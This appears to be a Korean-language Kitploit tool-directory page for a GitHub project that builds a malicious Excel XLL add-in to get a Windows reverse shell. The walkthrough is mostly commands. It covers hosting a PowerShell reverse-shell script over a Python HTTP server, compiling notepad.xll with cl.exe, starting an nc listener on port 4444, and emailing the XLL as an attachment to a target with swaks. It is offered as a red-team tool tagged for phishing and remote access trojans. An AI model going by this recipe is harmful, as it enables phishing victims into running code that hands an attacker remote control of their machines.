Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
xll_windows_reverse_shell — xll windows 리버스 셸 | Kitploit
도구/GitHubGitHub/h3x0v3rl0rd/xll_windows_reverse_shell
Phishing ToolsExploitationCommand and ControlSocial EngineeringRed TeamingPayload DevelopmentRemote Access Trojan
GitHubh3x0v3rl0rd/xll_windows_reverse_shell

xll_windows_reverse_shell

xll windows 리버스 셸

저장소 보기
161년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

xll_windows_reverse_shell

xll 윈도우 리버스 셸

공격자(Kali) 머신에서:

root@kitploit:~
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
  1. revsh.ps1을 업데이트하세요.
  2. python http 서버를 생성합니다.
root@kitploit:~
python3 -m http.server 9999

공격자(Windows) 머신에서:

  1. notpadXLL.c를 Windows 공격자 머신으로 이동하고 그에 맞게 notpadXLL.c를 업데이트하세요.
  2. x64 Native Tools Command Prompt for VS 2022를 엽니다.
  3. 아래 명령을 실행하여 notepad.xll을 생성합니다.
root@kitploit:~
cl.exe /LD notepadXLL.c /link /out:notepad.xll

image

  1. 이 notepad.xll을 Kali 머신으로 이동하세요.

Kali 머신에서

  1. swaks를 다운로드합니다.
root@kitploit:~
 curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
  1. nc 리스너를 구성합니다.
root@kitploit:~
nc -nlvp 4444
  1. swaks를 사용하여 notepad.xll이 첨부된 이메일을 전송합니다:
root@kitploit:~
./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll

image

도구 다운로드